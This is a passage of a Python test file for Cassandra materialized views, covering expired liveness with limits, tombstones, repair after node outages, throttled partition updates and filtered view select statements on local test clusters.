logger.debug(result.current_rows)
assert 0 == len(result.current_rows)
# For k = 2 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 0 == len(result.current_rows)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes1(self):
self._test_expired_liveness_with_limit(rf=1, nodes=1)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes3(self):
self._test_expired_liveness_with_limit(rf=1, nodes=3)
@since('3.0')
def test_expired_liveness_with_limit_rf3(self):
self._test_expired_liveness_with_limit(rf=3, nodes=3)
def _test_expired_liveness_with_limit(self, rf, nodes):
"""
Test MV with expired liveness limit is properly handled
@jira_ticket CASSANDRA-13883
"""
session = self.prepare(rf=rf, nodes=nodes, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
for k in range(100):
session.execute("INSERT INTO t (k, a, b) VALUES ({}, {}, {})".format(k, k, k))
# generate view row with expired liveness except for row 50 and 99
for k in range(100):
if k == 50 or k == 99:
continue
session.execute("DELETE a FROM t where k = {};".format(k))
# there should be 2 live data
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
# verify IN
keys = range(100)
assert_one(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 1".format(', '.join(str(x) for x in keys)),
[50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 2".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({})".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
# verify fetch size
session.default_fetch_size = 1
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_with_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=True)
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_without_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=False)
def _test_base_column_in_view_pk_commutative_tombstone_(self, flush):
"""
view row deletion should be commutative with newer view livenessInfo, otherwise deleted columns may be resurrected.
@jira_ticket CASSANDRA-13409
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
# sstable 1, Set initial values TS=1
self.update_view(session, "INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 1", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, 'a', 3.0])
# sstable 2, change v's value and TS=2, tombstones v=1 and adds v=0 record
self.update_view(session, "DELETE FROM t USING TIMESTAMP 2 WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_none(session, "SELECT * FROM t")
# sstable 3, tombstones of mv created by base deletion should remain.
self.update_view(session, "INSERT INTO t (id, v) VALUES (1, 1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None])
# sstable 4, shadow view row (id=1, v=1), insert (id=1, v=2, ts=4)
self.update_view(session, "UPDATE t USING TIMESTAMP 4 set v = 2 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [2, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 2, None, None])
# sstable 5, shadow view row (id=1, v=2), insert (id=1, v=1 ts=5)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = 1 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
# shadow view row (id=1, v=1)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = null WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_one(session, "SELECT * FROM t", [1, None, None, None])
def test_view_tombstone(self):
"""
Test that a materialized views properly tombstone
@jira_ticket CASSANDRA-10261
@jira_ticket CASSANDRA-10910
"""
self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.max_trace_wait = 120
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=0, verify
session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'a', 3.0]
)
session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
# change v's value and TS=3, tombstones v=1 and adds v=0 record
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1",
consistency_level=ConsistencyLevel.QUORUM))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
node2.start(wait_for_binary_proto=True)
# We should get a digest mismatch
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
# We should not get a digest mismatch the second time
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
# Verify values one last time
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0],
cl=ConsistencyLevel.ALL
)
def check_trace_events(self, trace, expect_digest):
# we should see multiple requests get enqueued prior to index scan
# execution happening
# Look for messages like:
# 4.0+ Digest mismatch: Mismatch for key DecoratedKey
# <4.0 Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: ([a-zA-Z.]+:\s)?Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
pytest.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
pytest.fail("Didn't find digest mismatch")
def test_simple_repair_by_base(self):
self._simple_repair_test(repair_base=True)
def test_simple_repair_by_view(self):
self._simple_repair_test(repair_view=True)
def _simple_repair_test(self, repair_base=False, repair_view=False):
"""
Test that a materialized view are consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in range(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
logger.debug('Start node2, and repair')
node2.start(wait_for_binary_proto=True)
if repair_base:
node1.nodetool("repair ks t")
if repair_view:
node1.nodetool("repair ks t_by_v")
logger.debug('Verify the data in the MV with CL=ALL. All should be available now and no digest mismatch')
for i in range(1000):
query = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert self._rows_to_list(result.current_rows), [[i, i, 'a' == 3.0]]
def test_base_replica_repair(self):
self._base_replica_repair_test()
def test_base_replica_repair_with_contention(self):
"""
Test repair does not fail when there is MV lock contention
@jira_ticket CASSANDRA-12905
"""
self._base_replica_repair_test(fail_mv_lock=True)
def _base_replica_repair_test(self, fail_mv_lock=False):
"""
Test that a materialized view are consistent after the repair of the base replica.
"""
self.prepare(rf=3)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Write initial data')
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug('Shutdown node1')
node1.stop(wait_other_notice=True)
logger.debug('Delete node1 data')
node1.clear(clear_all=True)
jvm_args = []
if fail_mv_lock:
if self.cluster.version() >= LooseVersion('3.10'): # CASSANDRA-10134
jvm_args = ['-Dcassandra.allow_unsafe_replace=true', '-Dcassandra.replace_address={}'.format(node1.address())]
jvm_args.append("-Dcassandra.test.fail_mv_locks_count=1000")
# this should not make Keyspace.apply throw WTE on failure to acquire lock
node1.set_configuration_options(values={'write_request_timeout_in_ms': 100})
logger.debug('Restarting node1 with jvm_args={}'.format(jvm_args))
node1.start(wait_for_binary_proto=True, jvm_args=jvm_args)
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
logger.debug('Verify that there is no data on node1')
for i in range(1000):
assert_none(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i)
)
logger.debug('Restarting node2 and node3')
node2.start(wait_for_binary_proto=True)
node3.start(wait_for_binary_proto=True)
# Just repair the base replica
logger.debug('Starting repair on node1')
node1.nodetool("repair ks t")
logger.debug('Verify data with cl=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
@pytest.mark.resource_intensive
def test_complex_repair(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
"WITH gc_grace_seconds = 5")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop()
node3.stop(wait_other_notice=True)
logger.debug('Write initial data to node1 (will be replicated to node4 and node5)')
for i in range(1000):
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
logger.debug('Verify the data in the MV on node1 with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Close connection to node1')
session.cluster.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
for i in range(1000):
assert_none(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
)
logger.debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
for i in range(1000):
# we write i*2 as value, instead of i
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
logger.debug('Verify the new data in the MV on node2 with CL=ONE')
for i in range(1000):
v = i * 2
assert_one(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0]
)
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
logger.debug('Read data from MV at QUORUM (old data should be returned)')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
logger.debug('Read data from MV at quorum (new data should be returned after repair)')
for i in range(1000):
v = i * 2
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
@pytest.mark.resource_intensive
def test_throttled_partition_update(self):
"""
@jira_ticket: CASSANDRA-13299, test break up large partition when repairing base with mv.
Provide a configuable batch size(cassandra.mv.mutation.row.count=100) to trottle number
of rows to be applied in one mutation
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
session.execute("CREATE TABLE ks.t (pk int, ck1 int, ck2 int, v1 int, v2 int, PRIMARY KEY(pk, ck1, ck2))")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE pk IS NOT NULL AND ck1 IS NOT NULL AND ck2 IS NOT NULL "
"PRIMARY KEY (pk, ck2, ck1)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
size = 50
range_deletion_ts = 30
partition_deletion_ts = 10
for ck1 in range(size):
for ck2 in range(size):
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (1, {}, {}, {}, {}) USING TIMESTAMP {}".format(ck1, ck2, ck1, ck2, ck1))
self._replay_batchlogs()
for ck1 in range(size):
for ck2 in range(size):
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
logger.debug('Shutdown node4 and node5')
node4.stop(wait_other_notice=True)
node5.stop(wait_other_notice=True)
for ck1 in range(size):
for ck2 in range(size):
if ck1 % 2 == 0: # range tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 50 WHERE pk=1 AND ck1={}".format(ck1))
elif ck1 == ck2: # row tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 60 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
session.execute("DELETE v2 FROM ks.t USING TIMESTAMP 70 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
# range deletion
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 < 30 and ck1 > 20".format(range_deletion_ts))
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 = 20 and ck2 < 10".format(range_deletion_ts))
# partition deletion for ck1 <= partition_deletion_ts
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1".format(partition_deletion_ts))
# only partition deletion for the pk=2000
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=2000".format(partition_deletion_ts))
self._replay_batchlogs()
# start nodes with different batch size
logger.debug('Starting nodes')
node2.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(2)])
node3.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5)])
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(50)])
node5.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5000)])
self._replay_batchlogs()
logger.debug('repairing base table')
node1.nodetool("repair ks t")
# insert data to the deleted partition with pk=2000, they should be considered dead
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (2000, 0, 0, 0, 0) USING TIMESTAMP {}".format(partition_deletion_ts - 1))
self._replay_batchlogs()
logger.debug('stop cluster')
self.cluster.stop()
logger.debug('rolling restart to check repaired data on each node')
for node in self.cluster.nodelist():
logger.debug('starting {}'.format(node.name))
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
for ck1 in range(size):
for ck2 in range(size):
if (
ck1 <= partition_deletion_ts or # partition deletion
ck1 == ck2 or ck1 % 2 == 0 or # row deletion or range tombstone
(ck1 > 20 and ck1 < 30) or (ck1 == 20 and ck2 < 10) # range tombstone
):
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
else:
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
# Verify partition deletion with pk=2000 has no live data
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=2000")
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=2000")
logger.debug('stopping {}'.format(node.name))
node.stop(wait_other_notice=True, wait_for_binary_proto=True)
@pytest.mark.resource_intensive
def test_really_complex_repair(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
"WITH gc_grace_seconds = 1")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
"v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
session.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
session2.execute('USE ks')
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
logger.debug('Write new data in node2 that overlap those in node1')
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
logger.debug("Composite delete of everything")
session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
self._replay_batchlogs()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
# at this point the data isn't repaired so we have an inconsistency.
# this value should return None
assert_all(
session2,
"SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def test_complex_mv_select_statements(self):
"""
Test complex MV select statements
@jira_ticket CASSANDRA-9664
"""
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
logger.debug("Creating keyspace")
session.execute("CREATE KEYSPACE mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
session.execute('USE mvtest')
mv_primary_keys = ["((a, b), c)",
"((b, a), c)",
"(a, b, c)",
"(c, b, a)",
"((c, a), b)"]
for mv_primary_key in mv_primary_keys:
session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
session.cluster.control_connection.wait_for_schema_agreement()
rows = [(0, 0, 0, 0),
(0, 0, 1, 0),
(0, 1, 0, 0),
(0, 1, 1, 0),
(1, 0, 0, 0),
(1, 0, 1, 0),
(1, 1, -1, 0),
(1, 1, 0, 0),
(1, 1, 1, 0)]
for row in rows:
session.execute(insert_stmt, row)
logger.debug("Testing MV primary key: {}".format(mv_primary_key))
session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
"a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
time.sleep(3)
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new rows that does not match the filter
session.execute(insert_stmt, (0, 0, 1, 0))
session.execute(insert_stmt, (1, 1, 0, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new row that does match the filter
session.execute(insert_stmt, (1, 2, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update rows that does not match the filter
session.execute(update_stmt, (1, 1, -1, 0))
session.execute(update_stmt, (0, 1, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update a row that does match the filter
session.execute(update_stmt, (2, 1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete rows that does not match the filter
session.execute(delete_stmt1, (1, 1, -1))
session.execute(delete_stmt1, (2, 0, 1))
session.execute(delete_stmt2, (0,))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a row that does match the filter
session.execute(delete_stmt1, (1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a partition that matches the filter
session.execute(delete_stmt2, (1,))
assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
# Cleanup
session.execute("DROP MATERIALIZED VIEW mv")
session.execute("DROP TABLE test")
def propagate_view_creation_over_non_existing_table(self):
"""
The internal addition of a view over a non existing table should be ignored
@jira_ticket CASSANDRA-13737
"""
cluster = self.cluster
cluster.populate(3)
cluster.start()
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
create_ks(session, 'ks', 3)
session.execute('CREATE TABLE users (username varchar PRIMARY KEY, state varchar)')
# create a materialized view only in nodes 1 and 2
node3.stop(wait_other_notice=True)
session.execute(('CREATE MATERIALIZED VIEW users_by_state AS '
'SELECT * FROM users WHERE state IS NOT NULL AND username IS NOT NULL '
'PRIMARY KEY (state, username)'))
# drop the base table only in node 3
node1.stop(wait_other_notice=True)
node2.stop(wait_other_notice=True)
node3.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node3, consistency_level=ConsistencyLevel.QUORUM)
session.execute('DROP TABLE ks.users')
# restart the cluster
cluster.stop()
cluster.start()
# node3 should have received and ignored the creation of the MV over the dropped table
assert node3.grep_log('Not adding view users_by_state because the base table')
def test_base_view_consistency_on_failure_after_mv_apply(self):
self._test_base_view_consistency_on_crash("after")
def test_base_view_consistency_on_failure_before_mv_apply(self):
self._test_base_view_consistency_on_crash("before")
def _test_base_view_consistency_on_crash(self, fail_phase):
"""
